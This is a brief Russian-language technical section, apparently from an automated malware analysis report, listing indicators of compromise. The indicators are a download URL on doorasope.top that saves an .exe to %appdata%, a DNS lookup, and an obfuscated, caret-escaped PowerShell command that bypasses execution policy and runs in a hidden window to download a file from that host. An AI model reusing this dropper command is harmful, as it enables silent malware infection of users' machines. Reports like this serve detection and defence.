Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOw^E^rs^heL^l.^EX^E -execUT^IoNPOLicY byPAsS -nO^p^R^OFILe^ -WINdOwS^T^Y^l^E ^h^Id^dEN (New-o^b^ject SystE^M.ne^T^.W^E^Bc^lIEnT^)^.D^ow^NL^O^AD^file(^'http://www.doorasope.to...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pOw^E^rs^heL^l.^EX^E -execUT^IoNPOLicY byPAsS -nO^p^R^OFILe^ -WINdOwS^T^Y^l^E ^h^Id^dEN (New-o^b^ject SystE^M.ne^T^.W^E^Bc^lIEnT^)^.D^ow^NL^O^AD^file(^'http://www.doorasope.to...' (со скрытым окном)